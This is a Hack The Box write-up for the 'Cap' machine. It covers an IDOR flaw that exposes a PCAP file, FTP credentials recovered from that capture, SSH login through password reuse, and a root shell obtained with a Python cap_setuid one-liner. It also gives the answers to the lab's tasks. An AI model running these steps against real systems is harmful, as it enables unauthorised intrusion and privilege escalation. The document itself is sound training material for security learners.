Hack The Box – Cap
Difficulty: Easy
Target IP: 10.10.10.X
Attacker Machine: Kali Linux
Date: 2026
Objective: Obtain User and Root flags
Executive Summary
The Cap machine was compromised through a chain of vulnerabilities starting with an IDOR flaw in the web application that exposed sensitive PCAP files. Credentials extracted from a packet capture granted SSH access as the user nathan. Privilege escalation was achieved by exploiting a misconfigured Python binary with the cap_setuid Linux capability.
1. Reconnaissance & Enumeration
1.1 Port Scanning
nmap -sC -sV -oN nmap.txt 10.10.10.X
Open Ports:
- 21/tcp – FTP
- 22/tcp – SSH
- 80/tcp – HTTP
Answer Task 1: 3 TCP ports are open.
1.2 Web Enumeration
Accessing port 80 revealed a dashboard with a “Security Snapshot” feature. Generating a snapshot redirected to /data/[id].
Answer Task 2: The directory is /data.
2. IDOR Vulnerability Discovery
The URL pattern /data/1 clearly indicated an ID parameter. Manually changing the ID revealed other users’ scan results.
Answer Task 3: Yes, it was possible to access other users’ scans.
This confirmed an Insecure Direct Object Reference (IDOR) vulnerability due to missing ownership validation.
3. PCAP Analysis & Credential Extraction
3.1 Identifying Sensitive Data
Testing multiple IDs showed that /data/0 contained a PCAP file with interesting network traffic.
Answer Task 4: The sensitive PCAP file is at ID 0.
3.2 Analyzing the PCAP
Opened the file in Wireshark and filtered for FTP traffic. Cleartext credentials for user nathan were discovered.
Answer Task 5: The sensitive data was transmitted over the FTP protocol.
4. Initial Access
4.1 FTP Access
Logged into the FTP service using the extracted credentials.
4.2 Password Reuse
Tested the same credentials on SSH:
ssh nathan@10.10.10.X
The password worked.
Answer Task 6: The password also works on SSH.
5. User Flag
After gaining SSH access:
ls /home/nathan cat user.txt
User flag obtained.
6. Privilege Escalation
6.1 Enumeration
Instead of checking sudo, I enumerated Linux capabilities:
getcap -r / 2>/dev/null
Key finding:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
6.2 Exploitation
The cap_setuid capability allows Python to change its effective user ID to root.
/usr/bin/python3.8 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’
Answer Task 8: The vulnerable binary is located at /usr/bin/python3.8.
7. Root Flag
cd /root cat root.txt
Root flag obtained.
Vulnerability Summary
| # | Vulnerability | Severity | Impact |
|---|---|---|---|
| 1 | IDOR in /data/{id} | High | Access to other users’ PCAP files |
| 2 | Cleartext FTP credentials | High | Credential disclosure |
| 3 | Password reuse (FTP → SSH) | Medium | Lateral movement |
| 4 | Misconfigured Linux capability (cap_setuid) |
Critical | Full root privilege escalation |
Full Attack Chain
- Port scan → Discover web service
- Identify IDOR in snapshot feature
- Download sensitive PCAP (ID 0)
- Extract FTP credentials from packet capture
- Reuse credentials for SSH access
- Enumerate Linux capabilities
- Exploit
cap_setuidon Python3.8 - Gain root shell
Key Lessons Learned
- Always manually test ID parameters for IDOR vulnerabilities.
- PCAP files frequently contain sensitive data (especially credentials).
- Password reuse across services is extremely common.
getcap -r /is a critical enumeration step during privilege escalation.- Linux capabilities can be more dangerous than traditional SUID binaries.
Machine Owned ✓